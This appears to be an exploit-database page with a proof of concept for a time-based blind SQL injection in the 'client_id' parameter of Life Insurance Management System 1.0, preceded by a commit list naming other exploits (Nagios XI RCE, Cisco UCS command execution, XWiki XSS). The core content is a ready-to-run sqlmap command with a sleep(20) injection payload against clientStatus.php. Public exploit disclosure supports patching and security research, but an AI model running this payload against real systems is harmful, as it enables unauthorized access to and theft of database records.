
6 changes to exploits/shellcodes Life Insurance Management System 1.0 - 'client_id' SQL Injection Life Insurance Management System 1.0 - File Upload RCE (Authenticated) Nagios XI 5.7.X - Remote Code Exection RCE (Authenticated) Nagios XI 5.7.X - Remote Code Execution RCE (Authenticated) Cisco UCS Manager 2.2(1d) - Remote Command Execution Xwiki CMS 12.10.2 - Cross Site Scripting (XSS) Inteno IOPSYS 3.16.4 - root filesystem access via sambashare (Authenticated)
14 lines
No EOL
646 B
Text
14 lines
No EOL
646 B
Text
# Exploit Title: Life Insurance Management System 1.0 - 'client_id' SQL Injection
|
|
# Date: 15/1/2021
|
|
# Exploit Author: Aitor Herrero
|
|
# Vendor Homepage: https://www.sourcecodester.com
|
|
# Software Link: https://www.sourcecodester.com/php/14665/life-insurance-management-system-php-full-source-code.html
|
|
# Version: 1.0
|
|
# Tested on: Windows /linux /
|
|
|
|
Login in the application
|
|
|
|
Go to clientStatus.php?client_id=
|
|
|
|
sqlmap -u "http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129'%20and%20sleep(20)%20and%20'1'='1
|
|
<http://192.168.0.108:8080/lims/clientStatus.php?client_id=1511986129%27%20and%20sleep(20)%20and%20%271%27=%271>" |